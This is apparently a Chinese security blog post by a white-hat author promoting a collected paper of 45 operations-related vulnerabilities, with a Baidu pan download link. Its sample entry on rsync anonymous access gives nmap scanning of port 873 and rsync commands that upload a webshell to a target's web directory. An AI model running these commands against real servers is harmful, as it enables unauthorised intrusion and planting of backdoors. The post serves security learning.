0x00 缘由
有人说:编程是一种美,是一门艺术,享受其中思维的妙曼身姿,一个有灵魂的程序猿叫做万物的“造物主”;
而我说:漏洞是一种美,是一个世界,畅游于黑暗的世界里探索,一个有个性的白帽子叫做世间的“救世主”。
0x01 概括
不知从何时起,养成了一个喜欢看“漏洞”的习惯,乌云的离开让很多人伤心而遗憾。不知从何时起,养成了一个喜欢记笔记、总结、思考的习惯,于是有了今天这份paper:
或许,很多朋友已经看到过标题,因为之前没有自己的公众号在T00Ls发过,后来又被人转到过爱春秋。现在打算开始尝试公众号,想起是时候把它纳入怀中了。
0x02 结构
这份 paper 没有太多个人思路,但却不失某一漏洞的利用方法及遇到的问题(当时有的没有解决,然而后来也没有继续补充)。仅单纯的按照自己的思路,记录和总结常见的运维相关安全漏洞。难免会有错误与不足(包括不全面)之处,还请大家不吝赐教。
1)很早之前为止,共收集运维相关漏洞45例
2)每例结构分为:基础知识、漏洞利用、实战演练(及修复方案)
以rsync匿名访问为例:
--1 基础知识
rsync 是一个远程数据同步工具,用 “rsync 算法”提供了一个客户机和远程文件服务器的文件同步的快速方法,在同步文件的同时,可以保持原来文件的权限、时间、软硬链接等附加信息。
下载文件:
./rsync -vzrtopg --progress --delete username@xxx.xxx.xxx.xxx::out /home/test/getfile
上传文件:
/user/bin/rsync -vzrtopg --progress /home/test/getfile username@xxx.xxx.xxx.xxx::out
--2 利用方法
rsync 默认端口是 873,可使用 nmap 进行扫描:
nmap –n –open –p 873 x.x.x.x/24
尝试上传、下载文件( kali 中):rsync 10.210.208.39::
或 rsync –vvvv rsync://10.210.208.39::
--3 实战演练
获取文件信息找到网站目录:# rsync -v xx.xx.xx.xx::
同步本地大马至远程服务器,上传webshell
# rsync -av /root/Desktop/youxiu.aspx xx.xx.xx.xx::Etest
确认是否成功: # rsync -v xx.xx.xx.xx::Etest
获取目标webshell:
3)每例中可能是一类漏洞的集合
比如struts漏洞:
又如web服务器解析漏洞:
0x03 结语
以上漏洞大餐可能时间较久,如果有想继续完善的朋友可以留言。
下载链接如下(下载即同意以上PS中的内容):
链接: https://pan.baidu.com/s/1o8mlfAE 密码: mk4d